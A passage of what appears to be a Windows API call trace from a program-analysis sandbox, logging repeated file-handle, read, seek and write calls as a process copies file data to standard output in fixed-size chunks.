GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: 
hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.965] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.965] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.966] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, 
lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.967] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.967] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 
0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.968] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.968] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) 
returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.969] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.969] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.970] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.971] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, 
lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, 
